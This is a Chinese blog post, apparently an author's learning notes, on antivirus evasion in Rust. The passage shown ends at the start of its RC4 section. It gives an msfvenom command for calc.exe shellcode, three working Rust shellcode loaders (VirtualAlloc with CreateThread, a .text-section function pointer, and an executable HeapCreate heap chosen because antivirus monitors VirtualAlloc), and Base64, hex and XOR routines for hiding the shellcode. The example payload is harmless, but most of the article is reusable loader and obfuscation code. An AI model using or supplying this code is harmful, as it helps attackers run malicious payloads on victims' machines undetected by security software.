<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前言这是半年前我学习Rust和免杀时的一些记录，最近打开知识库看到了这篇半年前的笔记，并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子，于是想着将这篇笔记分享出来供大家参考和指正。由于我写这篇文章时也刚刚开始接触Rust，所以文中所涉及的知识和代码都有可能出现错误，所以再次说明这篇文章仅供参考并希望大家指正。 Shellcode加载方式本文的主要目的是分享Rust对shell">
<meta property="og:type" content="article">
<meta property="og:title" content="Rust免杀-Shellcode加载与混淆">
<meta property="og:url" content="http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/index.html">
<meta property="og:site_name" content="colind0pe&#39;s blog">
<meta property="og:description" content="前言这是半年前我学习Rust和免杀时的一些记录，最近打开知识库看到了这篇半年前的笔记，并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子，于是想着将这篇笔记分享出来供大家参考和指正。由于我写这篇文章时也刚刚开始接触Rust，所以文中所涉及的知识和代码都有可能出现错误，所以再次说明这篇文章仅供参考并希望大家指正。 Shellcode加载方式本文的主要目的是分享Rust对shell">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-06-23T13:28:37.000Z">
<meta property="article:modified_time" content="2023-06-23T13:30:54.334Z">
<meta property="article:author" content="colind0pe">
<meta property="article:tag" content="Rust, 免杀">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Rust免杀-Shellcode加载与混淆</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2022/10/22/FOFA%E9%80%9A%E7%94%A8%E4%BA%A7%E5%93%81%E6%94%B6%E9%9B%86%E8%84%9A%E6%9C%AC/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&text=Rust免杀-Shellcode加载与混淆"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&is_video=false&description=Rust免杀-Shellcode加载与混淆"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Rust免杀-Shellcode加载与混淆&body=Check out this article: http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&title=Rust免杀-Shellcode加载与混淆"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&name=Rust免杀-Shellcode加载与混淆&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/06/23/Rust%E5%85%8D%E6%9D%80-Shellcode%E5%8A%A0%E8%BD%BD%E4%B8%8E%E6%B7%B7%E6%B7%86/&t=Rust免杀-Shellcode加载与混淆"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shellcode%E5%8A%A0%E8%BD%BD%E6%96%B9%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">Shellcode加载方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%B0%83%E7%94%A8WinAPI"><span class="toc-number">2.1.</span> <span class="toc-text">调用WinAPI</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%87%BD%E6%95%B0%E6%8C%87%E9%92%88"><span class="toc-number">2.2.</span> <span class="toc-text">函数指针</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E8%BF%87-heapapi-%E7%94%B3%E8%AF%B7%E5%86%85%E5%AD%98"><span class="toc-number">2.3.</span> <span class="toc-text">通过 heapapi 申请内存</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shellcode%E6%B7%B7%E6%B7%86%E6%96%B9%E5%BC%8F"><span class="toc-number">3.</span> <span class="toc-text">Shellcode混淆方式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Base64%E7%BC%96%E7%A0%81"><span class="toc-number">3.1.</span> <span class="toc-text">Base64编码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Hex%E7%BC%96%E7%A0%81"><span class="toc-number">3.2.</span> <span class="toc-text">Hex编码</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%BC%82%E6%88%96%E5%8A%A0%E5%AF%86"><span class="toc-number">3.3.</span> <span class="toc-text">异或加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#RC4%E5%8A%A0%E5%AF%86"><span class="toc-number">3.4.</span> <span class="toc-text">RC4加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#AES-CFB%E5%8A%A0%E5%AF%86"><span class="toc-number">3.5.</span> <span class="toc-text">AES-CFB加密</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B7%BB%E5%8A%A0%E9%9A%8F%E6%9C%BA%E5%AD%97%E7%AC%A6"><span class="toc-number">3.6.</span> <span class="toc-text">添加随机字符</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">4.</span> <span class="toc-text">总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83"><span class="toc-number">5.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Rust免杀-Shellcode加载与混淆
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">colind0pe</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-06-23T13:28:37.000Z" itemprop="datePublished">2023-06-23</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/%E5%90%8E%E6%B8%97%E9%80%8F/">后渗透</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Rust-%E5%85%8D%E6%9D%80/" rel="tag">Rust, 免杀</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>这是半年前我学习Rust和免杀时的一些记录，最近打开知识库看到了这篇半年前的笔记，并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子，于是想着将这篇笔记分享出来供大家参考和指正。由于我写这篇文章时也刚刚开始接触Rust，所以文中所涉及的知识和代码都有可能出现错误，所以再次说明这篇文章仅供参考并希望大家指正。</p>
<h2 id="Shellcode加载方式"><a href="#Shellcode加载方式" class="headerlink" title="Shellcode加载方式"></a>Shellcode加载方式</h2><p>本文的主要目的是分享Rust对shellcode的加密混淆方式，所以对于shellcode加载只介绍两种基本的方式，可能在后续的文章中会对加载方式进行更多分享。</p>
<h3 id="调用WinAPI"><a href="#调用WinAPI" class="headerlink" title="调用WinAPI"></a>调用WinAPI</h3><p>跟其他语言的shellcode加载器一样，要实现更多的shellcode加载方式，需要调用WinAPI。<br>执行shellcode的一般流程：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1. 创建或获取一段可读写执行的内存空间</span><br><span class="line">2. 将shellcode移入这块内存空间</span><br><span class="line">3. 利用各种方式将程序执行的流程指向这块内存空间</span><br></pre></td></tr></table></figure>

<p>Rust调用WinAPI需要先引入依赖，<code>Cargo</code>是Rust的一个包管理工具，要引入<code>winapi</code>依赖需要在<code>Cargo.toml</code>添加：</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">winapi</span> = &#123;version=<span class="string">&quot;0.3.9&quot;</span>,features=[<span class="string">&quot;winuser&quot;</span>,<span class="string">&quot;processthreadsapi&quot;</span>,<span class="string">&quot;memoryapi&quot;</span>,<span class="string">&quot;errhandlingapi&quot;</span>,<span class="string">&quot;synchapi&quot;</span>]&#125;</span><br></pre></td></tr></table></figure>

<p>这里以加载msf生成的弹计算器的shellcode为例，先使用<code>msfvenom</code>生成一段raw格式的shellcode，保存到<code>calc.bin</code>文件中，并复制到Rust的项目目录下。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/x64/<span class="built_in">exec</span> cmd=calc.exe -f raw -o calc.bin</span><br></pre></td></tr></table></figure>

<p>在Rust中，可以使用<code>include_bytes!</code>宏将静态文件在编译时包含进程序中。<br>下面通过调用<code>VirtualAlloc</code>申请一段内存，并设置为<code>PAGE_EXECUTE_READWRITE</code>权限，具体参数建议查阅微软WinAPI文档。然后通过<code>std::ptr::copy</code>将shellcode移动到内存中，接着通过<code>CreateThread</code>创建线程，<code>WaitForSingleObject</code>等待线程结束。<br>参考：<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc">VirtualAlloc function</a>, <a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread">CreateThread function</a>, <a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject">WaitForSingleObject function</a></p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> std::mem::transmute;</span><br><span class="line"><span class="keyword">use</span> winapi::um::errhandlingapi::GetLastError;</span><br><span class="line"><span class="keyword">use</span> winapi::um::memoryapi::VirtualAlloc;</span><br><span class="line"><span class="keyword">use</span> winapi::um::processthreadsapi::CreateThread;</span><br><span class="line"><span class="keyword">use</span> winapi::um::synchapi::WaitForSingleObject;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">main</span></span>() &#123;</span><br><span class="line">    <span class="keyword">let</span> buffer = include_bytes!(<span class="string">&quot;..\\calc.bin&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">unsafe</span> &#123;</span><br><span class="line">        <span class="keyword">let</span> ptr = VirtualAlloc(std::ptr::null_mut(), buffer.len(), <span class="number">0x00001000</span>, <span class="number">0x40</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> GetLastError() == <span class="number">0</span> &#123;</span><br><span class="line">            std::ptr::copy(buffer.as_ptr() <span class="keyword">as</span> *<span class="keyword">const</span> <span class="built_in">u8</span>, ptr <span class="keyword">as</span> *<span class="keyword">mut</span> <span class="built_in">u8</span>, buffer.len());</span><br><span class="line"></span><br><span class="line">            <span class="keyword">let</span> <span class="keyword">mut</span> threadid = <span class="number">0</span>;</span><br><span class="line">            <span class="keyword">let</span> threadhandle = CreateThread(</span><br><span class="line">                std::ptr::null_mut(),</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                <span class="literal">Some</span>(transmute(ptr)),</span><br><span class="line">                std::ptr::null_mut(),</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                &amp;<span class="keyword">mut</span> threadid,</span><br><span class="line">            );</span><br><span class="line"></span><br><span class="line">            WaitForSingleObject(threadhandle, <span class="number">0xFFFFFFFF</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="built_in">println!</span>(<span class="string">&quot;执行失败：&#123;&#125;&quot;</span>, GetLastError());</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="函数指针"><a href="#函数指针" class="headerlink" title="函数指针"></a>函数指针</h3><p><code>link_section</code>是Rust的一个<a target="_blank" rel="noopener" href="https://doc.rust-lang.org/reference/abi.html#the-link_section-attribute">attribute</a>，它用来将特定的函数或者变量放到程序的指定的区块中，<code>.text</code>区块通常用来存储程序的执行代码，它会被加载到内存中并由处理器执行。<br>然后通过<code>std::mem::transmute</code>将 <code>*const u8</code> 类型的指针转换为函数类型 <code>fn()</code>，最后执行shellcode。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">main</span></span>() &#123;</span><br><span class="line">    <span class="keyword">const</span> BUFFER_BYTES:&amp;[<span class="built_in">u8</span>] = include_bytes!(<span class="string">&quot;..\\calc.bin&quot;</span>);</span><br><span class="line">    <span class="keyword">const</span> BUFFER_SIZE:<span class="built_in">usize</span> = BUFFER_BYTES.len();</span><br><span class="line"></span><br><span class="line">    <span class="meta">#[link_section = <span class="meta-string">&quot;.text&quot;</span>]</span></span><br><span class="line">    <span class="keyword">static</span> BUFFER:[<span class="built_in">u8</span>;BUFFER_SIZE] = *include_bytes!(<span class="string">&quot;..\\calc.bin&quot;</span>);</span><br><span class="line">    <span class="keyword">unsafe</span>&#123;</span><br><span class="line">        <span class="keyword">let</span> exec = std::mem::transmute::&lt;*<span class="keyword">const</span> <span class="built_in">u8</span>,<span class="function"><span class="keyword">fn</span></span>()&gt;(&amp;BUFFER <span class="keyword">as</span> *<span class="keyword">const</span> <span class="built_in">u8</span>);</span><br><span class="line">        exec();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="通过-heapapi-申请内存"><a href="#通过-heapapi-申请内存" class="headerlink" title="通过 heapapi 申请内存"></a>通过 heapapi 申请内存</h3><p>由于<code>VirtualAlloc</code>是各大杀软的重点监控对象，所以通常需要使用其他的API来替代，下面介绍的是另一个常见的内存申请方式，即通过<code>HeapCreate/HeapAlloc</code>的组合来创建内存空间。<br>参考：<a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapcreate">HeapCreate function</a>, <a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc">HeapAlloc function</a></p>
<p>该方式同样需要先引入依赖，在<code>Cargo.toml</code>文件中添加如下依赖：</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">winapi</span> = &#123;version=<span class="string">&quot;0.3.9&quot;</span>,features=[<span class="string">&quot;winuser&quot;</span>,<span class="string">&quot;heapapi&quot;</span>,<span class="string">&quot;errhandlingapi&quot;</span>]&#125;</span><br></pre></td></tr></table></figure>

<p>该方法通过<code>HeapCreate</code>创建<code>HEAP_CREATE_ENABLE_EXECUTE</code>权限的内存堆，然后通过<code>HeapAlloc</code>来从堆中分配内存空间，最后通过函数指针的方式执行shellcode。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> std::mem::transmute;</span><br><span class="line"><span class="keyword">use</span> winapi::ctypes::c_void;</span><br><span class="line"><span class="keyword">use</span> winapi::um::errhandlingapi::GetLastError;</span><br><span class="line"><span class="keyword">use</span> winapi::um::heapapi::HeapAlloc;</span><br><span class="line"><span class="keyword">use</span> winapi::um::heapapi::HeapCreate;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">main</span></span>() &#123;</span><br><span class="line">    <span class="keyword">let</span> buffer = include_bytes!(<span class="string">&quot;..\\calc.bin&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">unsafe</span> &#123;</span><br><span class="line">        <span class="keyword">let</span> heap = HeapCreate(<span class="number">0x40000</span>, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">        <span class="keyword">let</span> ptr = HeapAlloc(heap, <span class="number">8</span>, buffer.len());</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> GetLastError() == <span class="number">0</span> &#123;</span><br><span class="line">            std::ptr::copy(buffer.as_ptr() <span class="keyword">as</span> *<span class="keyword">const</span> <span class="built_in">u8</span>, ptr <span class="keyword">as</span> *<span class="keyword">mut</span> <span class="built_in">u8</span>, buffer.len());</span><br><span class="line">            <span class="keyword">let</span> exec = transmute::&lt;*<span class="keyword">mut</span> c_void, <span class="function"><span class="keyword">fn</span></span>()&gt;(ptr);</span><br><span class="line">            exec();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Shellcode混淆方式"><a href="#Shellcode混淆方式" class="headerlink" title="Shellcode混淆方式"></a>Shellcode混淆方式</h2><p>上面介绍了在Rust中为shellcode申请内存空间和执行shellcode的几种常见的方式，接下来会介绍几种常见的编码和加密混淆方式在Rust中的实现。在实际的shellcode免杀的时候经常需要结合几种混淆方式，或者是自己设计加密混淆方式。</p>
<h3 id="Base64编码"><a href="#Base64编码" class="headerlink" title="Base64编码"></a>Base64编码</h3><p>在Rust中实现base64编码同样需要引入依赖，在<code>Cargo.toml</code>文件中添加如下依赖：</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">base64</span> = <span class="string">&quot;0.20.0&quot;</span></span><br></pre></td></tr></table></figure>

<p>通过下面的代码即可将传入的切片类型的shellcode进行base64编码并返回一段字符串。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">b64_enc</span></span>(shellcode: &amp;[<span class="built_in">u8</span>]) -&gt; <span class="built_in">String</span> &#123;</span><br><span class="line">    base64::encode(shellcode)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过以下代码即可将得到的字符串解码，并返回Vec数组类型的shellcode。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">b64_dec</span></span>(shellcode:<span class="built_in">String</span>) -&gt; <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; &#123;</span><br><span class="line">    base64::decode(shellcode).expect(<span class="string">&quot;Error&quot;</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="Hex编码"><a href="#Hex编码" class="headerlink" title="Hex编码"></a>Hex编码</h3><p>在Rust中实现Hex编码同样需要引入依赖，在<code>Cargo.toml</code>文件中添加如下依赖：</p>
<figure class="highlight toml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[dependencies]</span></span><br><span class="line"><span class="attr">hex</span> = <span class="string">&quot;0.4.3&quot;</span></span><br></pre></td></tr></table></figure>

<p>通过下面的代码即可将传入的切片类型的shellcode进行Hex编码并返回一段字符串。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">hex_enc</span></span>(shellcode: &amp;[<span class="built_in">u8</span>]) -&gt; <span class="built_in">String</span> &#123;</span><br><span class="line">    hex::encode(shellcode)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过以下代码即可将得到的字符串解码，并返回Vec数组类型的shellcode。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">hex_dec</span></span>(shellcode:<span class="built_in">String</span>) -&gt; <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; &#123;</span><br><span class="line">    hex::decode(shellcode).expect(<span class="string">&quot;Error&quot;</span>)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="异或加密"><a href="#异或加密" class="headerlink" title="异或加密"></a>异或加密</h3><p>通过迭代器将shellcode与key逐个字符进行异或，然后进行base64编码返回一段字符串。</p>
<p>要进行解密，需要先进行base64解码，然后将异或加密后的shellcode再次与key进行逐个字符进行异或，即可还原shellcode。</p>
<figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">xor_encrypt</span></span>(shellcode: &amp;[<span class="built_in">u8</span>], key: &amp;[<span class="built_in">u8</span>]) -&gt; <span class="built_in">String</span> &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> encrypted = <span class="built_in">Vec</span>::new();</span><br><span class="line">    <span class="keyword">for</span> (i, &amp;b) <span class="keyword">in</span> shellcode.iter().enumerate() &#123;</span><br><span class="line">        encrypted.push(b ^ key[i % key.len()]);</span><br><span class="line">    &#125;</span><br><span class="line">    base64::encode(&amp;encrypted)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">fn</span> <span class="title">xor_decrypt</span></span>(encrypted: &amp;[<span class="built_in">u8</span>], key: &amp;[<span class="built_in">u8</span>]) -&gt; <span class="built_in">Vec</span>&lt;<span class="built_in">u8</span>&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> encrypted = base64::decode(encrypted).expect(<span class="string">&quot;msg&quot;</span>);</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut</span> decrypted = <span class="built_in">Vec</span>::new();</span><br><span class="line">    <span class="keyword">for</span> (i, &amp;b) <span class="keyword">in</span> encrypted.iter().enumerate() &#123;</span><br><span class="line">        decrypted.push(b ^ key[i % key.len()]);</span><br><span class="line">    &#125;</span><br><span class="line">    decrypted</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="RC4加密"><a href="#RC4加密" class="headerlink" title="RC4加密"></a>RC4加密</h3><p>Rust要实现RC4加密与加密需要引入依赖，在<code>Cargo.toml</code>文件中添加下面的依赖。</p>
